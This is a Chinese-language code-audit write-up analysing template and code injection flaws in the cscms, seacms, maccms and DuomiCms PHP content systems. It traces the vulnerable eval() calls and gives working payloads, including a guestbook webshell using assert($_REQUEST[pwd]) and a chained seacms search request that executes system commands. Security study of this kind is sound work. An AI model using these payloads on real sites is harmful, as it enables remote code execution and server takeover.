代码审计,考察的是扎扎实实的本领,CMS的漏洞的挖掘能力是衡量一个Web狗的强弱的标准,强网杯的时候,Web题目考的了一个CMS的代码审计,考察到了SSTI漏洞,菜鸡一枚的我过来汇总一下在PHP中的SSTI漏洞,忘能抛砖引玉,引起读者的共鸣。
SSTI(服务端模板注入)和常见Web注入的成因一样,也是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。
具体的注入方式决定了其SSTI的由来。
模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程。
这里找了几个CMS漏洞中的SSTI的例子,简单的复现和分析一下,说不定能找出一些共性的特点呢。
win10+phpstudy: php5.6 apache2+mysql
第一种
URL:index.php/gbook
留言数据:{cscmsphp}assert($_REQUEST[pwd]);{/cscmsphp}
Shell:/index.php/gbook/lists/1?pwd=phpinfo();
第二种
URL:index.php/dance/search?key={cscmsphp}phpinfo();{/cscmsphp}
第二种的poc在强网比赛中好像是不能用,因为dance的模块好像是被阉割了。
核心的漏洞存在于
upload/cscms/app/models/Csskins.php
中的函数
public function cscms_php($php,$content,$str) { $evalstr=" return $content"; $newsphp=eval($evalstr); $str=str_replace($php,$newsphp,$str); return $str; }
不难看看出,这段代码使用危险函数eval
要找漏洞的话直接使用全局搜索的方法,找到这个函数的调用地点就好
调用的地方同样也是在这个文件中
//PHP代码解析 preg_match_all('/{cscmsphp}([\s\S]+?){\/cscmsphp}/',$str,$php_arr); if(!empty($php_arr[0])){ for($i=0;$i<count($php_arr[0]);$i++){ $str=$this->cscms_php($php_arr[0][$i],$php_arr[1][$i],$str); } } unset($php_arr);
关键点就在与控制$str
变量,从上面可以判定出,如果最后传入的值是类似如下这种形式,php的代码是可以执行的。
{cscmsphp}phpinfo();{/cscmsphp}
接下来寻找如何控制$str
的值,上述的代码存在与
upload/cscms/app/models/Csskins.php
的template_parse
函数中
全局搜索template_parse
函数
全局搜索之后,发现调用这个函数的地方有很多,但是我们要做的就是筛选出有漏洞的地方,但是什么是有漏洞的地方呢,一切输入都是有害的,所以,最好是能找到与数据库操作有关的内容,这些应该是我们要找的重点。
$Mark_Text=$this->Csskins->template_parse($Mark_Text,true);
搜索之后会发现,所有的模板大概都是这样加载的,于是我们就把重点放在了变量Mark_Text上面
逐个分析之后,发现
/cscms/upload/cscms/app/models/Cstpl.php
文件里操作渲染的数据是从数据库中取出来的,具体的内容如下
public function gbook_list($page=1){ if(User_BookFun==0){ //网站关闭留言 return "<div id='cscms_gbook'>网站已经关闭了在线留言~!</div>"; } $data_content=''; //装载模板 $Mark_Text=$this->load->view('gbook_ajax.html','',true); //预先除了分页 $pagenum=getpagenum($Mark_Text); preg_match_all('/{cscms:([\S]+)\s+(.*?pagesize=\"([\S]+)\".*?)}([\s\S]+?){\/cscms:\1}/',$Mark_Text,$page_arr); print_r($page_arr); print "fangzhang"; if(!empty($page_arr) && !empty($page_arr[2])){ print_r($page_arr[2]); $field=$page_arr[1][0]; //前缀名 //组装SQL数据 $sqlstr=$this->Csskins->cscms_sql($page_arr[1][0],$page_arr[2][0],$page_arr[0][0],$page_arr[3][0],'id',0); //总数量 $nums = $this->Csdb->get_allnums($sqlstr); $Arr=spanajaxpage($sqlstr,$nums,$page_arr[3][0],$pagenum,'cscms.getlGbook',$page); //判断页数大于2/3则倒序显示 if($Arr[6]>10 && $page > $Arr[6]*2/3){ $Arr[0] = current(explode(' LIMIT ', $Arr[0])); if(strpos($Arr[0], ' desc ') !== false){ $Arr[0] = str_replace(' desc ', ' asc ', $Arr[0]); }else{ $Arr[0] = str_replace(' asc ', ' desc ', $Arr[0]); } $spage = ($Arr[6]-$page)*$Arr[7]; $Arr[0] .= ' LIMIT '.$spage.','.$Arr[7]; } if($nums>0){ $sorti=1; $result_array=$this->db->query($Arr[0])->result_array(); foreach ($result_array as $row2) { $datatmp=$this->Csskins->cscms_skins($field,$page_arr[0][0],$page_arr[4][0],$row2,$sorti); $sorti++; $data_content.=$datatmp; } } print $data_content; $Mark_Text=page_mark($Mark_Text,$Arr); //分页解析 $Mark_Text=str_replace($page_arr[0][0],$data_content,$Mark_Text); } unset($page_arr); $Mark_Text=str_replace("[gbook:token]",get_token('gbook_token'),$Mark_Text); $Mark_Text=$this->Csskins->template_parse($Mark_Text,false); return $Mark_Text; }
在这个方法中,仔细观察一下那个$sqlstr
变量
在页面打印出来了如下的sql语句,
select * from `v41_gbook` where cid=1 and fid=0 order by id desc
经过页数的判断之后sql语句为如下变量$Arr[0]
打印如下:
select * from `v41_gbook` where cid=1 and fid=0 order by id desc LIMIT 0,5
结果保存在变量data_content
中,
经过如下语句替换之后,查询的结果保存在最开始要渲染的那个变量$Mark_Text
中
$Mark_Text=str_replace($page_arr[0][0],$data_content,$Mark_Text);
所以,我们可以通过控制的数据库的留言内容,来控制渲染的内容,
数据库的内容就是我们要插入的语句
我们可以通过这个方式留言
http://127.0.0.1/cscms/upload/index.php/gbook
抓包分析一下,可以看到使用的url是
/cscms/upload/index.php/gbook/add
在add的方法内,并没有什么过滤的方式
留言成之后通过这个方式访问
http://127.0.0.1/cscms/upload/index.php/gbook/lists/1?pwd=phpinfo();
以上就是整个代码审计的过程。
win10+phpstudy: php5.6 apache2+mysql seacms(v6.53)
POST /seacms(v6.53)/upload/search.php HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 208
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/seacms(v6.53)/upload/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: BEEFHOOK=9BIcNvrOYJ3zap74fscXQTchPtgyOGlbcO0DyQhdo7jP6k3prnO82U6v9cOOCFh1Xl8HLO0Bl417ZGSN; bdshare_firstime=1516777076849; UM_distinctid=16127562db49-05b0f0ac5b7059-454c092b-cc7fe-16127562dba35b; CNZZDATA1234139=cnzz_eid%3D1799312719-1516783434-%26ntime%3D1516783434; a4207_times=1; PHPSESSID=80dadc311b51e7ae6d8e4e57ff626241
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
依旧是全局搜索eval
函数,然后在一个函数里面看到了一个可疑的地方
function parseIf($content){ if (strpos($content,'{if:')=== false){ return $content; }else{ $labelRule = buildregx("{if:(.*?)}(.*?){end if}","is"); $labelRule2="{elseif"; $labelRule3="{else}"; preg_match_all($labelRule,$content,$iar); $arlen=count($iar[0]); $elseIfFlag=false; for($m=0;$m<$arlen;$m++){ $strIf=$iar[1][$m]; $strIf=$this->parseStrIf($strIf); $strThen=$iar[2][$m]; $strThen=$this->parseSubIf($strThen); if (strpos($strThen,$labelRule2)===false){ if (strpos($strThen,$labelRule3)>=0){ $elsearray=explode($labelRule3,$strThen); $strThen1=$elsearray[0]; $strElse1=$elsearray[1]; @eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}"); if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);} }else{ @eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}"); if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);} }else{ $elseIfArray=explode($labelRule2,$strThen); $elseIfArrayLen=count($elseIfArray); $elseIfSubArray=explode($labelRule3,$elseIfArray[$elseIfArrayLen-1]); $resultStr=$elseIfSubArray[1]; $elseIfArraystr0=addslashes($elseIfArray[0]); @eval("if($strIf){\$resultStr=\"$elseIfArraystr0\";}"); for($elseIfLen=1;$elseIfLen<$elseIfArrayLen;$elseIfLen++){ $strElseIf=getSubStrByFromAndEnd($elseIfArray[$elseIfLen],":","}",""); $strElseIf=$this->parseStrIf($strElseIf); $strElseIfThen=addslashes(getSubStrByFromAndEnd($elseIfArray[$elseIfLen],"}","","start")); @eval("if(".$strElseIf."){\$resultStr=\"$strElseIfThen\";}"); @eval("if(".$strElseIf."){\$elseIfFlag=true;}else{\$elseIfFlag=false;}"); if ($elseIfFlag) {break;} } $strElseIf0=getSubStrByFromAndEnd($elseIfSubArray[0],":","}",""); $strElseIfThen0=addslashes(getSubStrByFromAndEnd($elseIfSubArray[0],"}","","start")); if(strpos($strElseIf0,'==')===false&&strpos($strElseIf0,'=')>0)$strElseIf0=str_replace('=', '==', $strElseIf0); @eval("if(".$strElseIf0."){\$resultStr=\"$strElseIfThen0\";\$elseIfFlag=true;}"); $content=str_replace($iar[0][$m],$resultStr,$content); } } return $content; } }
函数的功能大概就是把输入的数据进行渲染,然后输出到页面去
在渲染模板的内容的时候有一个最终执行if语句,如果if语句里面的内容可控,我们将其写成一个表达式,就可以造成代码注入,然后造成代码执行。下面来进行分析我们的任务很明确,构造特殊的函数参数,得到一可以解析的php函数表达式
依次的调用栈如下:
@eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");//$strIf $strIf=$iar[1][$m]; $strIf=$this->parseStrIf($strIf); //$iar preg_match_all($labelRule,$content,$iar);//$content function parseIf($content){ //
然后就是全局查找parseIf
函数的调用情况
然后就到了漏洞最关键的地方。
在search.php
页面中有一个函数echoSearchPage();
变量$content
经过无数次的替换最后到达了我们想去的函数,我们需要做的工作就是把if语句构造出一个表达式,从而执行我们想要的函数,或者说是构造一个shell,在search.php
输入的变量都是可控的关键的代码如下:
if(intval($searchtype)==5) { $tname = !empty($tid)?getTypeNameOnCache($tid):'全部'; $jq = !empty($jq)?$jq:'全部'; $area = !empty($area)?$area:'全部'; $year = !empty($year)?$year:'全部'; $yuyan = !empty($yuyan)?$yuyan:'全部'; $letter = !empty($letter)?$letter:'全部'; $state = !empty($state)?$state:'全部'; $ver = !empty($ver)?$ver:'全部'; $money = !empty($money)?$money:'全部'; print base64_encode($content); $content = str_replace("{searchpage:type}",$tid,$content); $content = str_replace("{searchpage:typename}",$tname ,$content); $content = str_replace("{searchpage:year}",$year,$content); $content = str_replace("{searchpage:area}",$area,$content); $content = str_replace("{searchpage:letter}",$letter,$content); $content = str_replace("{searchpage:lang}",$yuyan,$content); $content = str_replace("{searchpage:jq}",$jq,$content); if($state=='w'){$state2="完结";}elseif($state=='l'){$state2="连载中";}else{$state2="全部";} if($money=='m'){$money2="免费";}elseif($money=='s'){$money2="收费";}else{$money2="全部";} $content = str_replace("{searchpage:state}",$state2,$content); $content = str_replace("{searchpage:money}",$money2,$content); $content = str_replace("{searchpage:ver}",$ver,$content); $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"cascade"); $content=$mainClassObj->parseSearchItemList($content,"type"); $content=$mainClassObj->parseSearchItemList($content,"year"); $content=$mainClassObj->parseSearchItemList($content,"area"); $content=$mainClassObj->parseSearchItemList($content,"letter"); $content=$mainClassObj->parseSearchItemList($content,"lang"); $content=$mainClassObj->parseSearchItemList($content,"jq"); $content=$mainClassObj->parseSearchItemList($content,"state"); $content=$mainClassObj->parseSearchItemList($content,"ver"); $content=$mainClassObj->parseSearchItemList($content,"money"); }else { $content=$mainClassObj->parsePageList($content,"",$page,$pCount,$TotalResult,"search"); }
如果进入了这个循环的话,就可以不断的操作content的内容了,如果不知道内容的话可以把它打印出来的。
结合poc体会一下其构造的艺术感觉
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem(dir);
按照顺序在可以分别得到如下结果:
searchword={if{searchpage:year} $content = str_replace("{seacms:searchword}",$searchword,$content);
得到
{if{searchpage:year}
year=:e{searchpage:area}} $content = str_replace("{searchpage:year}",$year,$content);
得到
{if:e{searchpage:area}}
area=v{searchpage:letter}
$content = str_replace("{searchpage:area}",$area,$content);
得到
{if:ev{searchpage:letter}
letter=al{searchpage:lang}
$content = str_replace("{searchpage:letter}",$letter,$content);
得到
{if:eval{searchpage:lang}
yuyan=(join{searchpage:jq}
$content = str_replace("{searchpage:lang}",$yuyan,$content);
得到
{if:eval(join{searchpage:jq}
jq=($_P{searchpage:ver}
$content = str_replace("{searchpage:jq}",$jq,$content);
得到
{if:eval(join($_P{searchpage:ver}
ver=OST[9]))
$content = str_replace("{searchpage:ver}",$ver,$content);
得到
{if:eval(join($_Pver=OST[9]))
这样就相当与是得到了一个shell
真的很佩服这个漏洞的作者。
win10+phpstudy: php5.6 apache2+mysql maccms_php_v8.x.zip
http://127.0.0.1/maccms/index.PHP?m=vod-search
POST 数据wd={if-A:phpinfo()}{endif-A}
其实这个CMS的漏洞原理和上一个CMS的漏洞的原理差不多,关键的几个点还是对模板的数据没有严格的过滤,然后用了eval,然后实在if语句上出的问题。以下做简要的分析。
这个CMS的渲染的方式和上一个出奇的相似
核心的代码还是在渲染if语句里面
这是路径
maccms\inc\common\template.php
关键函数在861行左右
function ifex()
{
if (!strpos(",".$this->H,"{if-")) { return; }
$labelRule = buildregx('{if-([\s\S]*?):([\s\S]+?)}([\s\S]*?){endif-\1}',"is");
preg_match_all($labelRule,$this->H,$iar);
print_r($iar);
$arlen=count($iar[2]);
出奇的相似,我们的目的还是要控制$this-H
的变化。因为正则匹配之后的结果都存入变量$iar
中了,
for($m=0;$m<$arlen;$m++){ $strn = $iar[1][$m]; $strif= asp2phpif( $iar[2][$m] ) ; $strThen= $iar[3][$m]; $elseifFlag=false; $labelRule2="{elseif-".$strn.""; $labelRule3="{else-".$strn."}"; if (strpos(",".$strThen,$labelRule2)>0){ $elseifArray=explode($labelRule2,$strThen); $elseifArrayLen=count($elseifArray); $elseifSubArray=explode($labelRule3,$elseifArray[$elseifArrayLen-1]); $resultStr=$elseifSubArray[1]; @eval("if($strif){\$resultStr='$elseifArray[0]';\$elseifFlag=true;}");
上面是核心的代码,关键还是控制 $strif
变量,要是想控制变量还是要控制$this->H
所以全局搜索函数调用的地方
在入口文件就已经发生对该函数的调用,
通过分析cms的路由可知,m=vod-search参数进行拆分vod参数和search参数,vod参数是进入的文件路径,search是vod.php的一个选项
wd是可以直接通过post方式传入的值
在search的模块中
$tpl->P["siteaid"] = 15; $wd = be("all", "wd"); if(!empty($wd)){ $tpl->P["wd"] = $wd; }
关键的替换代码
$colarr = array('{page:des}','{page:key}','{page:now}','{page:order}','{page:by}','{page:wd}','{page:wdencode}','{page:pinyin}','{page:letter}','{page:year}','{page:starring}','{page:starringencode}','{page:directed}','{page:directedencode}','{page:area}','{page:areaencode}','{page:lang}','{page:langencode}','{page:typeid}','{page:typepid}','{page:classid}'); $valarr = array($tpl->P["des"],$tpl->P["key"],$tpl->P["pg"],$tpl->P["order"],$tpl->P["by"],$tpl->P["wd"],urlencode($tpl->P["wd"]),$tpl->P["pinyin"],$tpl->P["letter"],$tpl->P['year']==0?'':$tpl->P['year'],$tpl->P["starring"],urlencode($tpl->P["starring"]),$tpl->P["directed"],urlencode($tpl->P["directed"]),$tpl->P["area"],urlencode($tpl->P["area"]),$tpl->P["lang"],urlencode($tpl->P["lang"]),$tpl->P['typeid'],$tpl->P['typepid'] ,$tpl->P['classid'] ); $tpl->H = str_replace($colarr, $valarr ,$tpl->H);
所以在渲染的时候,我们需要构造的就是wd这个参数,回过头可以看看我们需要构造什么样的正则
首先要符合正则表达式
{if-([\s\S]*?):([\s\S]+?)}([\s\S]*?){endif-\1}
类似这样:
{if-dddd:phpinfo()}{endif-dddd}
这就是那个payload了。
DuomiCms_v1.32
/search.php?searchtype=5&tid=&area=phpinfo()
不分析了,和上面两个差不多。感觉模板的渲染的思路好像是一样的。
SSTI只是注入漏洞的一种,其基本的原理依然是用户的不正常输入造成了有害的输出,简而言之,一切的输入都是有害的。
通过以上的几个CMS的分析看,主要的原因有如下几点:
http://rickgray.me/2015/11/03/server-side-template-injection-attack-analysis/
https://www.jianshu.com/p/a7838a89f2f9
https://www.jianshu.com/p/ebf156afda49